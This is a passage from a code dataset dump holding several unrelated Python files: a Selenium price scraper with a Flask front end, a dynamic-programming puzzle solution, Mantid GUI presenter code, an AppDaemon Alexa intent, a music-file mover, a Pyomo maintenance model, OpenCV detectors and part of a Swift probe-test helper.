WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'onetrust-accept-btn-handler'))).click()\n\n search_bar = driver.find_element(By.XPATH,\n '/html/body/div[1]/div[2]/header[2]/div[2]/div/div/div[2]/div/form/div[1]/input')\n\n search_bar.click()\n search_bar.send_keys(text + Keys.RETURN)\n\n expected = (By.CLASS_NAME, 'box')\n WebDriverWait(driver, 10).until(EC.presence_of_all_elements_located(expected))\n time.sleep(2)\n\n offers = driver.find_elements(By.CLASS_NAME, \"box\")\n links = driver.find_elements(By.CSS_SELECTOR, \"h2.name.is-section>a\")\n prices = driver.find_elements(By.CLASS_NAME, \"whole\")\n\n offer_list = []\n ratio_list = []\n link_list = []\n\n for offer in offers:\n offer_list.append(offer.text)\n ratio_list.append(jellyfish.jaro_winkler_similarity(text, offer.text))\n\n for link in links:\n link_list.append(link.get_attribute(\"href\"))\n\n price_list = []\n\n for price in prices:\n if not \",\" in price.text and not price.text == \"\":\n price_list.append(clean_price_media(price.text))\n\n min_price = get_min_price(ratio_list, price_list, threshold, 0.5)\n\n driver.quit()\n\n if offer_list == []:\n return \"No offers found\"\n else:\n if min_price:\n price_index = price_list.index(min_price)\n return offer_list[price_index], min_price, link_list[price_index]\n else:\n return \"Prices too high\"\n\n######################################################\n# email sending functions\n######################################################\n\n\ndef results_to_html_list(webpage, input):\n if type(input) != str:\n my_string = \"\"\"      • Web store: {0}        \n Offer: {1}        \n Price: {2}        \n Link: {3}      • \n \"\"\".format(webpage, input[0], input[1], input[2])\n return my_string\n else:\n my_string = \"\"\"      • Web store: {0}        \n Offer: No results to show      • \"\"\".format(webpage)\n return my_string\n\n\ndef send_email(sender, receiver, subject, results_list):\n\n email_list = []\n\n for result in results_list:\n email_list.append(results_to_html_list(result[0], result[1]))\n\n contents = \"\"\"\n        Hi!        \n Below please find the results of your search:        \n          \n {0}\n        \n        KR,        \n Your Python code        \n \"\"\".format('        '.join(email_list))\n\n yag = yagmail.SMTP(user=sender, password=os.getenv('secret_key'))\n yag.send(to=receiver, subject=subject, contents=contents)\n\n\n######################################################\n# Flask app\n######################################################\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('./index.html',\n status=\" hidden\",\n results_rtv=(str(), str(), str()),\n results_media=(str(), str(), str()),)\n\n\n@app.route('/', methods=['POST'])\ndef home_post():\n\n price = float(request.form['price-name'])\n email = str(request.form['email-name'])\n product = str(request.form['product-name'])\n\n results_rtv = rtv_get_results(product, \"https://www.euro.com.pl/\", price)\n results_media = media_get_results(product, \"https://www.mediaexpert.pl/\", price)\n\n if type(results_rtv) == str and type(results_media) == str:\n final_text = \"No results to send via email.\"\n else:\n final_text = \"The results were also sent to the provided email.\"\n results_list = [[\"RTV EURO AGD\", results_rtv], [\"Media Expert\", results_media]]\n send_email('sender email', email, \"RTV product finder results\", results_list)\n\n if type(results_rtv) == str:\n results_rtv = (results_rtv, str(), str())\n\n if type(results_media) == str:\n results_media = (results_media, str(), str())\n\n return render_template('index.html',\n status=\" \",\n price_max=price,\n product=product,\n email=email,\n final_text=final_text,\n results_rtv=results_rtv,\n results_media=results_media)\n\n\napp.run(host='0.0.0.0')\n","repo_name":"kp-muszynski/RTV-web-scraping","sub_path":"web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12006893918","text":"# dp[1] = 1\n# dp[2] = 2: the larger of using one 2-card or two 1-cards.\n# dp[3] = 3: the larger of one 3-card, or a 1-card plus dp[2]; making 3 as 1,1,1 or as 1,2 was already handled in dp[2]\n# dp[n] = n: max of one n-card, or 1 with dp[n-1], or dp[2] with dp[n-2], ..., dp[i] with dp[n-i]\n\nn = int(input())\nprices = list(map(int, input().split()))\nprices.insert(0, 0)\n\ndp = [0] * (n+1)\ndp[0] = 0\ndp[1] = prices[1]\ndp[2] = max(prices[2], dp[1] + prices[1])\n\nfor i in range(3, n+1):\n dp[i] = prices[i]\n for j in range(1, i):\n dp[i] = max(dp[i], dp[j] + dp[i-j])\n\nprint(dp[-1])\n","repo_name":"plibi/codingtest","sub_path":"BOJ/11052.py","file_name":"11052.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"7712322366","text":"from mantidqtinterfaces.Muon.GUI.Common.corrections_tab_widget.dead_time_corrections_model import DeadTimeCorrectionsModel\nfrom mantidqtinterfaces.Muon.GUI.Common.corrections_tab_widget.dead_time_corrections_view import DeadTimeCorrectionsView\nfrom mantidqtinterfaces.Muon.GUI.Common.utilities.load_utils import get_table_workspace_names_from_ADS, load_dead_time_from_filename\n\n\nclass DeadTimeCorrectionsPresenter:\n \"\"\"\n The DeadTimeCorrectionsPresenter has a DeadTimeCorrectionsView and DeadTimeCorrectionsModel.\n \"\"\"\n\n def __init__(self, view: DeadTimeCorrectionsView, model: DeadTimeCorrectionsModel, corrections_presenter):\n \"\"\"Initialize the DeadTimeCorrectionsPresenter. 
Sets up the slots and event observers.\"\"\"\n self.view = view\n self.model = model\n self._corrections_presenter = corrections_presenter\n\n self.view.set_slot_for_dead_time_from_selector_changed(self.handle_dead_time_from_selector_changed)\n self.view.set_slot_for_dead_time_workspace_selector_changed(self.handle_dead_time_workspace_selector_changed)\n self.view.set_slot_for_dead_time_file_browse_clicked(self.handle_dead_time_browse_clicked)\n\n def initialize_model_options(self) -> None:\n \"\"\"Initialise the model with the default fitting options.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n\n def handle_ads_clear_or_remove_workspace_event(self, _: str = None) -> None:\n \"\"\"Handle when there is a clear or remove workspace event in the ADS.\"\"\"\n if self.model.is_dead_time_source_from_data_file():\n self.view.set_dead_time_from_data_file_selected()\n elif self.model.is_dead_time_source_from_workspace():\n self.view.set_dead_time_from_workspace_selected()\n\n def handle_instrument_changed(self) -> None:\n \"\"\"User changes the selected instrument.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n self.view.set_dead_time_from_data_file_selected()\n\n def handle_run_selector_changed(self) -> None:\n \"\"\"Handles when the run selector is changed.\"\"\"\n if self.model.is_dead_time_source_from_data_file():\n self.model.set_dead_time_source_to_from_file()\n self.update_dead_time_info_text_in_view()\n\n def handle_dead_time_from_selector_changed(self) -> None:\n \"\"\"Handles when the location where the dead time should be retrieved from changes.\"\"\"\n if self.view.is_dead_time_from_data_file_selected():\n self._handle_dead_time_from_data_file_selected()\n self._set_dead_time_widgets_visible(False, False)\n elif self.view.is_dead_time_from_workspace_selected():\n self._handle_dead_time_from_workspace_selected()\n self._set_dead_time_widgets_visible(True, False)\n elif self.view.is_dead_time_from_other_file_selected():\n self._handle_dead_time_from_none_selected()\n self._set_dead_time_widgets_visible(False, True)\n else:\n self._handle_dead_time_from_none_selected()\n self._set_dead_time_widgets_visible(False, False)\n\n def _handle_dead_time_from_data_file_selected(self) -> None:\n \"\"\"Handles when the dead time from data file is initially selected.\"\"\"\n self.set_dead_time_source_to_from_file()\n\n def _handle_dead_time_from_workspace_selected(self) -> None:\n \"\"\"Handles when the dead time from workspace is initially selected.\"\"\"\n self.view.populate_dead_time_workspace_selector(get_table_workspace_names_from_ADS())\n self.set_dead_time_source_to_from_ads()\n\n def _handle_dead_time_from_none_selected(self) -> None:\n \"\"\"Handles when the dead time is none is initially selected.\"\"\"\n self.set_dead_time_source_to_none()\n\n def handle_dead_time_workspace_selector_changed(self) -> None:\n \"\"\"The user changes the selected Table Workspace to use as dead time.\"\"\"\n table_name = self.view.selected_dead_time_workspace()\n if table_name == \"None\" or table_name == \"\":\n self._handle_dead_time_from_none_selected()\n else:\n error = self.model.validate_selected_dead_time_workspace(table_name)\n if error == \"\":\n self.set_dead_time_source_to_from_ads()\n else:\n self.view.set_selected_dead_time_workspace(\"None\")\n self._handle_selected_table_is_invalid()\n self._corrections_presenter.warning_popup(error)\n\n def _handle_selected_table_is_invalid(self) -> None:\n \"\"\"Handles when the selected dead time table workspace is invalid.\"\"\"\n # 
Triggers handle_dead_time_from_selector_changed\n self.view.set_dead_time_from_data_file_selected()\n\n def handle_dead_time_browse_clicked(self) -> None:\n \"\"\"User selects the option to Browse for a nexus file to load dead times from.\"\"\"\n filename = self.view.show_file_browser_and_return_selection([\"nxs\"], [\"\"], multiple_files=False)[0]\n if filename != \"\":\n name = self._load_file_containing_dead_time(filename)\n if name is not None:\n self.view.populate_dead_time_workspace_selector(get_table_workspace_names_from_ADS())\n error = self.model.validate_selected_dead_time_workspace(name)\n if error == \"\":\n self.view.switch_to_using_a_dead_time_table_workspace(name)\n else:\n self._corrections_presenter.warning_popup(error)\n\n def handle_pre_process_and_counts_calculated(self) -> None:\n \"\"\"Handles when MuonPreProcess and counts workspaces have been calculated.\"\"\"\n self.update_dead_time_info_text_in_view()\n\n def update_dead_time_info_text_in_view(self) -> None:\n \"\"\"Update the dead time info label in the view.\"\"\"\n if self.model.is_dead_time_source_from_data_file() or self.model.is_dead_time_source_from_workspace():\n self.view.set_dead_time_average_and_range(\n self._corrections_presenter.current_run_string(), self.model.dead_times_range(), self.model.dead_times_average()\n )\n else:\n self.view.set_dead_time_info_text(\"No dead time correction\")\n\n def set_dead_time_source_to_from_file(self) -> None:\n \"\"\"Sets the dead time source to be from the data file and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n self._notify_perform_dead_time_corrections()\n\n def set_dead_time_source_to_from_ads(self) -> None:\n \"\"\"Sets the dead time source to be the ADS and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_from_ads(self.view.selected_dead_time_workspace())\n self._notify_perform_dead_time_corrections()\n\n def set_dead_time_source_to_none(self) -> None:\n \"\"\"Sets the dead time source to be none and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_none()\n self._notify_perform_dead_time_corrections()\n\n def _set_dead_time_widgets_visible(self, workspace_mode_visible: bool, other_file_mode_visible: bool) -> None:\n \"\"\"Sets which dead time widgets are visible.\"\"\"\n self.view.set_dead_time_workspace_selector_visible(workspace_mode_visible)\n self.view.set_dead_time_other_file_visible(other_file_mode_visible)\n\n def _load_file_containing_dead_time(self, filename: str) -> str:\n \"\"\"Attempts to load a Nexus cycle file containing a dead time table workspace.\"\"\"\n try:\n name = load_dead_time_from_filename(filename)\n except Exception:\n self._corrections_presenter.warning_popup(\n \"The file provided has an unexpected format. 
The file should be \" \"of the same instrument and cycle as the raw data.\"\n )\n return None\n\n if name == \"\":\n self._corrections_presenter.warning_popup(\"The file provided does not contain dead time data.\")\n return None\n return name\n\n def _notify_perform_dead_time_corrections(self) -> None:\n \"\"\"A notification event to trigger the calculation of the dead time corrections.\"\"\"\n self._corrections_presenter.disable_editing_notifier.notify_subscribers()\n self._corrections_presenter.perform_corrections_notifier.notify_subscribers()\n self._corrections_presenter.enable_editing_notifier.notify_subscribers()\n","repo_name":"mantidproject/mantid","sub_path":"qt/python/mantidqtinterfaces/mantidqtinterfaces/Muon/GUI/Common/corrections_tab_widget/dead_time_corrections_presenter.py","file_name":"dead_time_corrections_presenter.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"39"} +{"seq_id":"11735922080","text":"import appdaemon.plugins.hass.hassapi as hass\nimport random\n\nclass woIsSomeoneIntent(hass.Hass):\n\n def initialize(self):\n return\n\n def getIntentResponse(self, slots, devicename):\n try:\n ############################################\n # an example Intent to show how you can change text\n # based on sensor states or time\n ############################################\n if self.slots[\"person\"] in self.args[\"household\"]:\n ############################################\n # decide if a person is guest or not\n ############################################\n if self.get_state(\"sensor.\" + self.slots[\"person\"]) == \"In bed\":\n ############################################\n # assumes that there are sensors for every person \n # with a state if thet are in Bed\n ############################################\n text = self.random_arg(self.args[\"inBed\"])\n elif self.get_state(\"sensor.kellertime\") == \"ja\":\n ############################################\n # assumes that there is a sensor thats set to \"ja\"\n # for a certain event\n ############################################\n text = self.random_arg(self.args[\"kellerTime\"])\n elif self.now_is_between(\"18:00:00\",\"18:30:00\"):\n ############################################\n # at dinertime give another text\n ############################################\n text = self.random_arg(self.args[\"diner\"])\n elif self.slots[\"person\"] == \"olinde\":\n if self.now_is_between(\"16:00:00\",\"17:30:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Olinde\"][\"couch\"])\n elif self.now_is_between(\"17:30:00\",\"18:00:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Olinde\"][\"cooking\"])\n else:\n text = self.random_arg(self.args[\"Olinde\"][\"somethingElse\"])\n elif self.slots[\"person\"] == \"rene\":\n if self.now_is_between(\"19:00:00\",\"20:00:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Rene\"][\"couch\"])\n else:\n text = self.random_arg(self.args[\"Rene\"][\"somethingElse\"])\n else:\n text = self.random_arg(self.args[\"Other\"][\"somethingElse\"])\n else:\n text = 
self.random_arg(self.args[\"Other\"][\"somethingElse\"])\n except: \n text = self.args[\"Error\"]\n return text\n\n def random_arg(self,argName):\n ############################################\n # pick a random text from a list\n ############################################\n if isinstance(argName,list):\n text = random.choice(argName)\n else:\n text = argname\n return text\n","repo_name":"ReneTode/Alexa-Appdaemon-App","sub_path":"apps/internet/alexa/example_intents/woIsSomeone/woIsSomeoneIntent.py","file_name":"woIsSomeoneIntent.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"de","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"16667754697","text":"# -*- coding: utf-8 -*-\n# 用于将各专辑文件夹下的歌曲文件搬到同一个文件夹里边, 使用前请把 neteaseMusicPath 改成自己电脑上的路径\n# 特别注意路径末尾的 \\\\\n# zhian.h@qq.com\n# python flat_music.py\n\nimport io\nimport os\nimport sys\nimport shutil\n\nsys.stdout = io.TextIOWrapper(\n sys.stdout.buffer, encoding='utf-8') # 改变标准输出的默认编码\n\nneteaseMusicPath = \"D:\\\\houzhian\\\\Music\\\\iTunes\\\\iTunes Media\\\\Music\\\\\"\noutputPath = \"D:\\\\houzhian\\\\Music\\\\iTunes\\\\iTunes Media\\\\output\\\\\"\n\n\ndef stealFile(path, outputPath):\n for roots, dirs, files in os.walk(path):\n for file in files:\n try:\n shutil.move(os.path.join(roots, file), outputPath)\n print(os.path.join(roots, file))\n except Exception as e:\n print(e)\n pass\n for dir in dirs:\n stealFile(dir, outputPath)\n\n\nif __name__ == '__main__':\n stealFile(neteaseMusicPath, outputPath)\n","repo_name":"jaan-hou/NeteaseCloudMusic-tools","sub_path":"flat_music.py","file_name":"flat_music.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34489179630","text":"from pyomo.environ import *\nimport numpy as np\n\nmodel = ConcreteModel()\nTT = 5#5\nmodel.T = RangeSet(0, TT-1) # time periods\n\n# i0 = 5.0 # initial inventory\n# c = 4.6 # setup cost\n# h_pos = 0.7 # inventory holding cost\n# h_neg = 1.2 # shortage cost\n# P = 5.0 # maximum production amount\n# # demand during period t\n# d = {1: 5.0, 2:7.0, 3:6.2, 4:3.1, 5:1.7}\n\nn_condition = 3\nn_operation = 3\nmodel.n_condition = RangeSet(0, n_condition-1)\nmodel.n_operation = RangeSet(0, n_operation-1)\n\n\nN = 1000\n\ns0 = [0.25, 0.7, 0.05]\n\ncon1_m_performance = np.asarray([[1, 0, 0], [1, 0, 0], [0.99, 0.01, 0]])\ncon2_m_performance = np.asarray([[0, 1, 0], [0.5, 0.5, 0], [0.99, 0.01, 0]])\ncon3_m_performance = np.asarray([[0, 0, 1], [0.1, 0.3, 0.6], [0.99, 0.01, 0]])\ncon_m_performance = np.zeros([n_condition, n_operation, n_condition])\ncon_m_performance[0, :] = con1_m_performance\ncon_m_performance[1, :] = con2_m_performance\ncon_m_performance[2, :] = con3_m_performance\n\ndegradeP = np.asarray([[0.7, 0.3, 0], [0, 0.8, 0.2], [0, 0, 1]])\nmaintenance_cost = np.asarray([[0, 0, 0], [30, 50, 100], [500, 500, 1000]])\n\n# define the variables\n#model.y = Var(model.T, domain=Binary)\n#model.x = Var(model.T, domain=NonNegativeReals)\nmodel.x = Var(RangeSet(TT), RangeSet(n_condition * (n_operation - 1)), initialize=0.6, bounds=(0, 1)) #action\n#model.x = Set(initialize=1.01*np.zeros([model.T, (n_condition * (n_operation - 1))]), domain=NonNegativeReals, bounds = (0, 1), ordered = True) #action\nmodel.u = Var(RangeSet(TT),RangeSet(n_condition * n_operation), initialize = 0, within=NonNegativeReals) #action\n#model.s = Var(RangeSet(TT), RangeSet(n_condition), domain=NonNegativeReals) #state\nmodel.costi = Var(RangeSet(TT), 
initialize=0, domain=NonNegativeReals) #cost\nmodel.ii = Var(RangeSet(TT), RangeSet(n_condition), initialize = 0, domain=NonNegativeReals)\nmodel.iii = Var(RangeSet(TT), initialize = 0, domain=NonNegativeReals)\n#model.aa = Var(RangeSet(1), domain=NonNegativeReals)\n\n\nuu = np.zeros(TT * n_operation * n_condition)\nss0 = np.zeros([TT + 1, n_condition])\nss0[0, :] = s0\n\n#constraint\ndef time_action(m, t):\n #print(t)\n for tj in m.n_condition:\n #print(tj)\n aa = 0\n for tk in m.n_operation:\n #print(tk)\n if tk == 0:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = \\\n value(m.x[t + 1, tj * (n_operation - 1) + tk + 1])\n m.u[t + 1, tj * n_operation + tk + 1] = \\\n value(m.x[t + 1, tj * (n_operation - 1) + tk + 1])\n aa += uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])]\n\n if tk < n_operation - 1 and tk > 0:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = \\\n (m.x[t + 1, tj * (n_operation - 1) + tk + 1].value) * (1 - aa)\n m.u[t + 1, tj * n_operation + tk + 1] = \\\n (m.x[t + 1, tj * (n_operation - 1) + tk + 1].value) * (1 - aa)\n aa += uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])]\n\n if tk == n_operation - 1:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = 1 - aa\n m.u[t + 1, tj * n_operation + tk + 1] = 1 - aa\n\n\n uu0 = uu[t * n_operation * n_condition : (t+1) * n_operation * n_condition]\n\n\n for ti in m.n_condition:\n ss0[t+1, :] += ((ss0[t, ti] * uu0[ti * n_operation : (ti + 1) * n_operation]).dot(con_m_performance[ti, :])).dot(degradeP)\n m.costi[t + 1] = value(m.costi[t + 1]) + N * uu0[ti * n_operation : (ti + 1) * n_operation].dot(maintenance_cost[:, ti])\n \n if ss0[t+1, n_condition-1] > 0.05:\n m.costi[t + 1] = value(m.costi[t + 1]) + 1e15\n \n for j in range(n_condition):\n m.ii[t+1, j+1] = ss0[t+1, j]\n\n return m.ii[t+1, n_condition] == ss0[t+1, n_condition-1]\n\nmodel.action = Constraint(model.T, rule=time_action)\n\n\ndef last_condition(m, t):\n m.iii[t + 1] = m.ii[t+1, n_condition].value\n return m.iii[t + 1] -0.05 <= 0\n\nmodel.last_con = Constraint(model.T, rule=last_condition)\n#model.last_con_ct = Constraint(model.T, rule=last_condition_const)\n\n\n# define the cost function\ndef obj_rule(m):\n return sum(m.costi[ti + 1] for ti in m.T)\n\nmodel.obj = Objective(rule=obj_rule)\n\n# solve the problem\nimport cplex\nimport sys\nsys.path.append('/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-84_linux')\nsolver = SolverFactory('cplex', executable = \"/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux/cplex\")#('glpk')\nsolution = solver.solve(model) #, executable = \"/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux/cplex\")\nmodel.action.pprint()\nmodel.last_con.pprint()\n\nfrom pyomo.opt import SolverStatus, TerminationCondition\nif (solution.solver.status == SolverStatus.ok) and (solution.solver.termination_condition == TerminationCondition.optimal):\n print(\"Solution is feasible and optimal\")\n print(\"Objective function value = \", model.obj())\nelif solution.solver.termination_condition == TerminationCondition.infeasible:\n print (\"Failed to find solution.\")\nelse:\n # something else is wrong\n print(str(solution.solver))\n# print the results\nfor t in model.T:\n #print(model.x[2, 3].value)\n print('Period: {0}, Prod. 
Amount: {1}'.format(t, uu[np.ravel_multi_index([t, 0], [TT, n_operation * n_condition]): (np.ravel_multi_index([t, n_operation * n_condition-1], [TT, n_operation * n_condition])+1)]))","repo_name":"Jueming6/LPRT","sub_path":"pyomo_maintenance.py","file_name":"pyomo_maintenance.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5820012277","text":"import imutils\r\nimport numpy as np\r\nimport cv2 as cv\r\nfrom imutils.object_detection import non_max_suppression\r\n\r\n\r\nfrom Models.CallProvider import CallProvider\r\nfrom Models.Connections import FramesConnection\r\n\r\n\r\nclass Detector:\r\n __classifier = None\r\n class_detection = \"\"\r\n n_frames = 20\r\n\r\n def getRects(self, frame):\r\n return []\r\n\r\n def showFrame(self, frame):\r\n frame = imutils.resize(frame)\r\n cv.imshow(\"Detector\", frame)\r\n cv.waitKey(1)\r\n\r\n def find(__db_frames):\r\n\r\n # class which permit to save frames\r\n f = FramesConnection()\r\n\r\n # class which call directly the phones of clients in case of detection\r\n cp = CallProvider()\r\n\r\n # variable which\r\n one_shot = True\r\n\r\n # open the cam in read mode\r\n cap = cv.VideoCapture(0, cv.CAP_DSHOW)\r\n # counter of consecutive faces detected in the frames\r\n i = 0\r\n\r\n while True:\r\n ret, frame = cap.read()\r\n\r\n # no frames stop\r\n if not ret:\r\n break\r\n\r\n # transformation from RGB to Gray chanel\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n\r\n rect = __db_frames.getRects(frame)\r\n\r\n for (x, y, w, h) in rect:\r\n # put the rectangles in the image\r\n cv.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n # put the text in the frames\r\n cv.putText(frame, __db_frames.class_detection, (x, y - 10), cv.FONT_ITALIC, 0.9, (36, 255, 12), 2)\r\n\r\n # count the number of faces detected\r\n n_face = len(rect)\r\n i += 1\r\n\r\n # reset false positive face\r\n if n_face == 0:\r\n i = 0\r\n\r\n if i > __db_frames.n_frames:\r\n #cp.doCall()\r\n i = 0\r\n\r\n # check if there are faces\r\n is_face = (n_face > 0)\r\n\r\n # post the frames\r\n if is_face and one_shot:\r\n # TODO: find the correct format of frames for mongoDB\r\n f.post(\"face\", is_face)\r\n one_shot = False\r\n\r\n __db_frames.showFrame(frame)\r\n\r\n\r\nclass DetectorFace(Detector):\r\n class_detection = \"Face\"\r\n path_mask = 'rsc/haarcascade_frontalface_default.xml'\r\n\r\n def __init__(self, scale_factor=1.1, min_neighbors=5):\r\n self.__classifier = cv.CascadeClassifier(self.path_mask)\r\n self.scale_factor = scale_factor\r\n self.min_neighbors = min_neighbors\r\n\r\n def getRects(self, frame):\r\n return self.__classifier.detectMultiScale(frame, self.scale_factor, self.min_neighbors)\r\n\r\n\r\nclass DetectorPedestrian(Detector):\r\n class_detection = \"Pedestrian\"\r\n\r\n def __init__(self, win_stride=(4, 4), padding=(8, 8), scale=1.05, probs=None, overlap_thresholding=0.50):\r\n self.__classifier = cv.HOGDescriptor()\r\n self.__classifier.setSVMDetector(cv.HOGDescriptor_getDefaultPeopleDetector())\r\n self.win_stride = win_stride\r\n self.padding = padding\r\n self.scale = scale\r\n self.probs = probs\r\n self.overlap_trasholding = overlap_thresholding\r\n\r\n def getRects(self, frame):\r\n # detect people in the gray frame\r\n rects, _ = self.__classifier.detectMultiScale(frame, winStride=self.win_stride, padding=self.padding,\r\n scale=self.scale)\r\n\r\n # apply non-maxima suppression to the bounding boxes using a\r\n # fairly large 
overlap threshold to try to maintain overlapping\r\n # boxes that are still people\r\n rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\r\n pick = non_max_suppression(rects, probs=self.probs, overlapThresh=self.overlap_trasholding)\r\n return pick\r\n","repo_name":"GianfilippoBellin/raspberryPi-faceAlarm","sub_path":"Models/Detectors.py","file_name":"Detectors.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9388875559","text":"#!/usr/bin/python -u\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom __future__ import print_function\nimport functools\nimport sys\nfrom io import BytesIO\nimport itertools\nimport uuid\nfrom optparse import OptionParser\nimport random\n\nimport six\nfrom six.moves.urllib.parse import urlparse, parse_qs, quote\n\nfrom swift.common.manager import Manager\nfrom swift.common import utils, ring\nfrom swift.common.internal_client import InternalClient, UnexpectedResponse\nfrom swift.common.storage_policy import POLICIES\nfrom swift.common.http import HTTP_NOT_FOUND\n\nfrom swiftclient import client, get_auth, ClientException\n\nfrom test.probe import PROXY_BASE_URL\nfrom test.probe.common import ENABLED_POLICIES\n\nTIMEOUT = 60\n\n\ndef meta_command(name, bases, attrs):\n \"\"\"\n Look for attrs with a truthy attribute __command__ and add them to an\n attribute __commands__ on the type that maps names to decorated methods.\n The decorated methods' doc strings also get mapped in __docs__.\n\n Also adds a method run(command_name, *args, **kwargs) that will\n execute the method mapped to the name in __commands__.\n \"\"\"\n commands = {}\n docs = {}\n for attr, value in attrs.items():\n if getattr(value, '__command__', False):\n commands[attr] = value\n # methods always have a __doc__ attribute, sometimes empty\n docs[attr] = (getattr(value, '__doc__', None) or\n 'perform the %s command' % attr).strip()\n attrs['__commands__'] = commands\n attrs['__docs__'] = docs\n\n def run(self, command, *args, **kwargs):\n return self.__commands__[command](self, *args, **kwargs)\n attrs.setdefault('run', run)\n return type(name, bases, attrs)\n\n\ndef command(f):\n f.__command__ = True\n return f\n\n\n@six.add_metaclass(meta_command)\nclass BaseBrain(object):\n def _setup(self, account, container_name, object_name,\n server_type, policy):\n self.account = account\n self.container_name = container_name\n self.object_name = object_name\n server_list = ['%s-server' % server_type] if server_type else ['all']\n self.servers = Manager(server_list)\n policies = list(ENABLED_POLICIES)\n random.shuffle(policies)\n self.policies = itertools.cycle(policies)\n\n o = object_name if server_type == 'object' else None\n c = container_name if server_type in ('object', 'container') else None\n if server_type in ('container', 'account'):\n if policy:\n raise TypeError('Metadata server brains do not '\n 'support specific storage policies')\n self.policy = None\n self.ring = 
ring.Ring(\n '/etc/swift/%s.ring.gz' % server_type)\n elif server_type == 'object':\n if not policy:\n raise TypeError('Object BrainSplitters need to '\n 'specify the storage policy')\n self.policy = policy\n policy.load_ring('/etc/swift')\n self.ring = policy.object_ring\n else:\n raise ValueError('Unknown server_type: %r' % server_type)\n self.server_type = server_type\n\n self.part, self.nodes = self.ring.get_nodes(self.account, c, o)\n\n self.node_numbers = [n['id'] + 1 for n in self.nodes]\n if 1 in self.node_numbers and 2 in self.node_numbers:\n self.primary_numbers = (1, 2)\n self.handoff_numbers = (3, 4)\n else:\n self.primary_numbers = (3, 4)\n self.handoff_numbers = (1, 2)\n\n @command\n def start_primary_half(self):\n \"\"\"\n start servers 1 & 2\n \"\"\"\n tuple(self.servers.start(number=n) for n in self.primary_numbers)\n\n @command\n def stop_primary_half(self):\n \"\"\"\n stop servers 1 & 2\n \"\"\"\n tuple(self.servers.stop(number=n) for n in self.primary_numbers)\n\n @command\n def start_handoff_half(self):\n \"\"\"\n start servers 3 & 4\n \"\"\"\n tuple(self.servers.start(number=n) for n in self.handoff_numbers)\n\n @command\n def stop_handoff_half(self):\n \"\"\"\n stop servers 3 & 4\n \"\"\"\n tuple(self.servers.stop(number=n) for n in self.handoff_numbers)\n\n @command\n def put_container(self, policy_index=None):\n \"\"\"\n put container with next storage policy\n \"\"\"\n\n if policy_index is not None:\n policy = POLICIES.get_by_index(int(policy_index))\n if not policy:\n raise ValueError('Unknown policy with index %s' % policy)\n elif not self.policy:\n policy = next(self.policies)\n else:\n policy = self.policy\n\n headers = {'X-Storage-Policy': policy.name}\n self.client.put_container(self.container_name, headers=headers)\n\n @command\n def delete_container(self):\n \"\"\"\n delete container\n \"\"\"\n self.client.delete_container(self.container_name)\n\n @command\n def put_object(self, headers=None, contents=None):\n \"\"\"\n issue put for test object\n \"\"\"\n self.client.put_object(self.container_name, self.object_name,\n headers=headers, contents=contents)\n\n @command\n def delete_object(self):\n \"\"\"\n issue delete for test object\n \"\"\"\n self.client.delete_object(self.container_name, self.object_name)\n\n @command\n def get_object(self):\n \"\"\"\n issue GET for test object\n \"\"\"\n return self.client.get_object(self.container_name, self.object_name)\n\n\nclass PublicBrainClient(object):\n def __init__(self, url, token):\n self.url = url\n self.token = token\n self.account = utils.split_path(urlparse(url).path, 2, 2)[1]\n\n def put_container(self, container_name, headers):\n return client.put_container(self.url, self.token, container_name,\n headers=headers)\n\n def post_container(self, container_name, headers):\n return client.post_container(self.url, self.token, container_name,\n headers)\n\n def delete_container(self, container_name):\n return client.delete_container(self.url, self.token, container_name)\n\n def put_object(self, container_name, object_name, headers, contents,\n query_string=None):\n return client.put_object(self.url, self.token, 